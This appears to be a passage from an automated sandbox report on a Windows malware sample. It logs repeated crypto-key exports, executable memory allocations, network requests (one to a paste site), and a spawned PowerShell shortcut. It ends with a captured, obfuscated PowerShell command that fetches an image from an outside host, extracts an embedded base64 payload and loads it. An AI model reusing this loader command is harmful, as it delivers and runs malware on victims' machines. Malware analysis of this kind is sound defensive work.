 buffer: <INVALID POINTER>
crypto_handle: 0x00316308
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00316308
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00316308
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00316308
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00316808
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00316808
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00316808
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00316808
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00316808
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00316808
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00316808
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00316808
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00316808
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00316808
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00316808
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00316808
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00316808
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00316808
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00316888
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00316888
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0071e690
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0071e710
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0071e710
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0071e710
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0071ef90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0071ef90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0071ef90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0071ef90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0071ef90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0071ef90
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
request GET http://apps.identrust.com/roots/dstrootcax3.p7c
request GET https://paste.ee/d/Hhg3l
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2140
region_size: 2293760
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02650000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02840000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2140
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72fd1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024da000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2140
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x72fd2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024d2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024e2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02841000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2140
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02842000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0250a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024e3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024e4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0255b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02557000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024db000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02502000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02555000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024e5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0250c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026c0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x024e6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0255c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02503000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02504000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02505000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02506000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02507000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02508000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02509000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049d0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049d1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049d2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049d3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049d4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049d5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049d6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049d7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049d8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049d9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049da000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049db000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049dc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049dd000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049de000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x049df000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f20000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f21000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f22000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f23000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2140
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04f24000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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